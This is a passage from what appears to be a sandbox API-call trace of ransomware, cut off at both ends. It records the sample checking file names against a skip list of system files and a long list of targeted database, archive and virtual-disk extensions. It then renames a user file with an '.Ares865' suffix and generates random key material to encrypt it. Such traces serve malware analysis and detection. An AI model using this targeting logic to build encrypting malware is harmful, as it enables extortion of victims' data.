(lpString1="0nc7 RNZKx5.lnk", lpString2="temp") returned -1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="pagefile.sys") returned -1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="boot") returned -1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="ids.txt") returned -1 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="ntuser.dat") returned -1 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="perflogs") returned -1 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="MSBuild") returned -1 [0092.912] lstrlenW (lpString="0nc7 RNZKx5.lnk") returned 15 [0092.912] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0jIgSp-.ots.lnk") returned 52 [0092.912] lstrcpyW (in: lpString1=0x2cce44a, lpString2="0nc7 RNZKx5.lnk" | out: lpString1="0nc7 RNZKx5.lnk") returned="0nc7 RNZKx5.lnk" [0092.912] lstrlenW (lpString="0nc7 RNZKx5.lnk") returned 15 [0092.912] lstrlenW (lpString="Ares865") returned 7 [0092.912] lstrcmpiW (lpString1="Kx5.lnk", lpString2="Ares865") returned 1 [0092.912] lstrlenW (lpString=".dll") returned 4 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2=".dll") returned 1 [0092.912] lstrlenW (lpString=".lnk") returned 4 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2=".lnk") returned 1 [0092.912] lstrlenW (lpString=".ini") returned 4 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2=".ini") returned 1 [0092.912] lstrlenW (lpString=".sys") returned 4 [0092.912] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2=".sys") returned 1 [0092.912] lstrlenW (lpString="0nc7 RNZKx5.lnk") returned 15 [0092.912] lstrlenW (lpString="bak") returned 3 [0092.912] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.912] lstrlenW (lpString="ba_") returned 3 [0092.912] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.912] lstrlenW (lpString="dbb") returned 3 [0092.912] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.912] lstrlenW (lpString="vmdk") returned 4 [0092.912] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.912] lstrlenW (lpString="rar") returned 3 [0092.912] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.912] lstrlenW (lpString="zip") returned 3 [0092.912] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.912] lstrlenW (lpString="tgz") returned 3 [0092.912] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.912] lstrlenW (lpString="vbox") returned 4 [0092.912] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.912] lstrlenW (lpString="vdi") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.913] lstrlenW (lpString="vhd") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.913] lstrlenW (lpString="vhdx") returned 4 [0092.913] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.913] lstrlenW (lpString="avhd") returned 4 [0092.913] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.913] lstrlenW (lpString="db") returned 2 [0092.913] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.913] lstrlenW (lpString="db2") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.913] lstrlenW (lpString="db3") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.913] lstrlenW (lpString="dbf") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.913] lstrlenW (lpString="mdf") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.913] lstrlenW (lpString="mdb") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.913] lstrlenW (lpString="sql") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.913] lstrlenW (lpString="sqlite") returned 6 [0092.913] lstrcmpiW (lpString1="x5.lnk", lpString2="sqlite") returned 1 [0092.913] lstrlenW (lpString="sqlite3") returned 7 [0092.913] lstrcmpiW (lpString1="Kx5.lnk", lpString2="sqlite3") returned -1 [0092.913] lstrlenW (lpString="sqlitedb") returned 8 [0092.913] lstrcmpiW (lpString1="ZKx5.lnk", lpString2="sqlitedb") returned 1 [0092.913] lstrlenW (lpString="xml") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.913] lstrlenW (lpString="$er") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.913] lstrlenW (lpString="4dd") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.913] lstrlenW (lpString="4dl") returned 3 [0092.913] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.913] lstrlenW (lpString="^^^") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.914] lstrlenW (lpString="abs") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.914] lstrlenW (lpString="abx") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.914] lstrlenW (lpString="accdb") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accdb") returned -1 [0092.914] lstrlenW (lpString="accdc") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accdc") returned -1 [0092.914] lstrlenW (lpString="accde") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accde") returned -1 [0092.914] lstrlenW (lpString="accdr") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accdr") returned -1 [0092.914] lstrlenW (lpString="accdt") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accdt") returned -1 [0092.914] lstrlenW (lpString="accdw") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accdw") returned -1 [0092.914] lstrlenW (lpString="accft") returned 5 [0092.914] lstrcmpiW (lpString1="5.lnk", lpString2="accft") returned -1 [0092.914] lstrlenW (lpString="adb") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.914] lstrlenW (lpString="adb") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.914] lstrlenW (lpString="ade") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.914] lstrlenW (lpString="adf") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.914] lstrlenW (lpString="adn") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.914] lstrlenW (lpString="adp") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.914] lstrlenW (lpString="alf") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.914] lstrlenW (lpString="ask") returned 3 [0092.914] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.915] lstrlenW (lpString="btr") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.915] lstrlenW (lpString="cat") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.915] lstrlenW (lpString="cdb") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.915] lstrlenW (lpString="ckp") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.915] lstrlenW (lpString="cma") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.915] lstrlenW (lpString="cpd") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.915] lstrlenW (lpString="dacpac") returned 6 [0092.915] lstrcmpiW (lpString1="x5.lnk", lpString2="dacpac") returned 1 [0092.915] lstrlenW (lpString="dad") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.915] lstrlenW (lpString="dadiagrams") returned 10 [0092.915] lstrcmpiW (lpString1="RNZKx5.lnk", lpString2="dadiagrams") returned 1 [0092.915] lstrlenW (lpString="daschema") returned 8 [0092.915] lstrcmpiW (lpString1="ZKx5.lnk", lpString2="daschema") returned 1 [0092.915] lstrlenW (lpString="db-journal") returned 10 [0092.915] lstrcmpiW (lpString1="RNZKx5.lnk", lpString2="db-journal") returned 1 [0092.915] lstrlenW (lpString="db-shm") returned 6 [0092.915] lstrcmpiW (lpString1="x5.lnk", lpString2="db-shm") returned 1 [0092.915] lstrlenW (lpString="db-wal") returned 6 [0092.915] lstrcmpiW (lpString1="x5.lnk", lpString2="db-wal") returned 1 [0092.915] lstrlenW (lpString="dbc") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.915] lstrlenW (lpString="dbs") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.915] lstrlenW (lpString="dbt") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.915] lstrlenW (lpString="dbv") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.915] lstrlenW (lpString="dbx") returned 3 [0092.915] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.916] lstrlenW (lpString="dcb") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.916] lstrlenW (lpString="dct") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.916] lstrlenW (lpString="dcx") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.916] lstrlenW (lpString="ddl") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.916] lstrlenW (lpString="dlis") returned 4 [0092.916] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.916] lstrlenW (lpString="dp1") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.916] lstrlenW (lpString="dqy") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.916] lstrlenW (lpString="dsk") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.916] lstrlenW (lpString="dsn") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.916] lstrlenW (lpString="dtsx") returned 4 [0092.916] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.916] lstrlenW (lpString="dxl") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.916] lstrlenW (lpString="eco") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.916] lstrlenW (lpString="ecx") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.916] lstrlenW (lpString="edb") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.916] lstrlenW (lpString="epim") returned 4 [0092.916] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.916] lstrlenW (lpString="fcd") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.916] lstrlenW (lpString="fdb") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.916] lstrlenW (lpString="fic") returned 3 [0092.916] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.916] lstrlenW (lpString="flexolibrary") returned 12 [0092.916] lstrcmpiW (lpString1="7 RNZKx5.lnk", lpString2="flexolibrary") returned -1 [0092.917] lstrlenW (lpString="fm5") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.917] lstrlenW (lpString="fmp") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.917] lstrlenW (lpString="fmp12") returned 5 [0092.917] lstrcmpiW (lpString1="5.lnk", lpString2="fmp12") returned -1 [0092.917] lstrlenW (lpString="fmpsl") returned 5 [0092.917] lstrcmpiW (lpString1="5.lnk", lpString2="fmpsl") returned -1 [0092.917] lstrlenW (lpString="fol") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.917] lstrlenW (lpString="fp3") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.917] lstrlenW (lpString="fp4") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.917] lstrlenW (lpString="fp5") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.917] lstrlenW (lpString="fp7") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.917] lstrlenW (lpString="fpt") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.917] lstrlenW (lpString="frm") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.917] lstrlenW (lpString="gdb") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.917] lstrlenW (lpString="gdb") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.917] lstrlenW (lpString="grdb") returned 4 [0092.917] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.917] lstrlenW (lpString="gwi") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.917] lstrlenW (lpString="hdb") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.917] lstrlenW (lpString="his") returned 3 [0092.917] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.917] lstrlenW (lpString="ib") returned 2 [0092.917] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.917] lstrlenW (lpString="idb") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.918] lstrlenW (lpString="ihx") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.918] lstrlenW (lpString="itdb") returned 4 [0092.918] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.918] lstrlenW (lpString="itw") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.918] lstrlenW (lpString="jet") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.918] lstrlenW (lpString="jtx") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.918] lstrlenW (lpString="kdb") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.918] lstrlenW (lpString="kexi") returned 4 [0092.918] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.918] lstrlenW (lpString="kexic") returned 5 [0092.918] lstrcmpiW (lpString1="5.lnk", lpString2="kexic") returned -1 [0092.918] lstrlenW (lpString="kexis") returned 5 [0092.918] lstrcmpiW (lpString1="5.lnk", lpString2="kexis") returned -1 [0092.918] lstrlenW (lpString="lgc") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.918] lstrlenW (lpString="lwx") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.918] lstrlenW (lpString="maf") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.918] lstrlenW (lpString="maq") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.918] lstrlenW (lpString="mar") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.918] lstrlenW (lpString="marshal") returned 7 [0092.918] lstrcmpiW (lpString1="Kx5.lnk", lpString2="marshal") returned -1 [0092.918] lstrlenW (lpString="mas") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.918] lstrlenW (lpString="mav") returned 3 [0092.918] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.918] lstrlenW (lpString="maw") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.919] lstrlenW (lpString="mdbhtml") returned 7 [0092.919] lstrcmpiW (lpString1="Kx5.lnk", lpString2="mdbhtml") returned -1 [0092.919] lstrlenW (lpString="mdn") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.919] lstrlenW (lpString="mdt") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.919] lstrlenW (lpString="mfd") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.919] lstrlenW (lpString="mpd") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.919] lstrlenW (lpString="mrg") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.919] lstrlenW (lpString="mud") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.919] lstrlenW (lpString="mwb") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.919] lstrlenW (lpString="myd") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.919] lstrlenW (lpString="ndf") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.919] lstrlenW (lpString="nnt") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.919] lstrlenW (lpString="nrmlib") returned 6 [0092.919] lstrcmpiW (lpString1="x5.lnk", lpString2="nrmlib") returned 1 [0092.919] lstrlenW (lpString="ns2") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.919] lstrlenW (lpString="ns3") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.919] lstrlenW (lpString="ns4") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.919] lstrlenW (lpString="nsf") returned 3 [0092.919] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.919] lstrlenW (lpString="nv") returned 2 [0092.919] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.919] lstrlenW (lpString="nv2") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.920] lstrlenW (lpString="nwdb") returned 4 [0092.920] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.920] lstrlenW (lpString="nyf") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.920] lstrlenW (lpString="odb") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.920] lstrlenW (lpString="odb") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.920] lstrlenW (lpString="oqy") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.920] lstrlenW (lpString="ora") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.920] lstrlenW (lpString="orx") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.920] lstrlenW (lpString="owc") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.920] lstrlenW (lpString="p96") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.920] lstrlenW (lpString="p97") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.920] lstrlenW (lpString="pan") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.920] lstrlenW (lpString="pdb") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.920] lstrlenW (lpString="pdm") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.920] lstrlenW (lpString="pnz") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.920] lstrlenW (lpString="qry") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.920] lstrlenW (lpString="qvd") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.920] lstrlenW (lpString="rbf") returned 3 [0092.920] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.920] lstrlenW (lpString="rctd") returned 4 [0092.920] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.921] lstrlenW (lpString="rod") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.921] lstrlenW (lpString="rodx") returned 4 [0092.921] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.921] lstrlenW (lpString="rpd") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.921] lstrlenW (lpString="rsd") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.921] lstrlenW (lpString="sas7bdat") returned 8 [0092.921] lstrcmpiW (lpString1="ZKx5.lnk", lpString2="sas7bdat") returned 1 [0092.921] lstrlenW (lpString="sbf") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.921] lstrlenW (lpString="scx") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.921] lstrlenW (lpString="sdb") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.921] lstrlenW (lpString="sdc") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.921] lstrlenW (lpString="sdf") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.921] lstrlenW (lpString="sis") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.921] lstrlenW (lpString="spq") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.921] lstrlenW (lpString="te") returned 2 [0092.921] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.921] lstrlenW (lpString="teacher") returned 7 [0092.921] lstrcmpiW (lpString1="Kx5.lnk", lpString2="teacher") returned -1 [0092.921] lstrlenW (lpString="tmd") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.921] lstrlenW (lpString="tps") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.921] lstrlenW (lpString="trc") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.921] lstrlenW (lpString="trc") returned 3 [0092.921] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.921] lstrlenW (lpString="trm") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.922] lstrlenW (lpString="udb") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.922] lstrlenW (lpString="udl") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.922] lstrlenW (lpString="usr") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.922] lstrlenW (lpString="v12") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.922] lstrlenW (lpString="vis") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.922] lstrlenW (lpString="vpd") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.922] lstrlenW (lpString="vvv") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.922] lstrlenW (lpString="wdb") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.922] lstrlenW (lpString="wmdb") returned 4 [0092.922] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.922] lstrlenW (lpString="wrk") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.922] lstrlenW (lpString="xdb") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.922] lstrlenW (lpString="xld") returned 3 [0092.922] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.922] lstrlenW (lpString="xmlff") returned 5 [0092.922] lstrcmpiW (lpString1="5.lnk", lpString2="xmlff") returned -1 [0092.922] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0nc7 RNZKx5.lnk.Ares865") returned 60 [0092.922] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0nc7 RNZKx5.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0nc7 rnzkx5.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0nc7 RNZKx5.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0nc7 rnzkx5.lnk.ares865"), dwFlags=0x1) returned 1 [0092.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0nc7 RNZKx5.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0nc7 rnzkx5.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.924] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6258) returned 1 [0092.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.924] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.925] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.925] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.925] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b80, lpName=0x0) returned 0x15c [0092.925] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b80) returned 0x190000 [0092.925] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.926] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.926] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.926] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.926] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.927] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 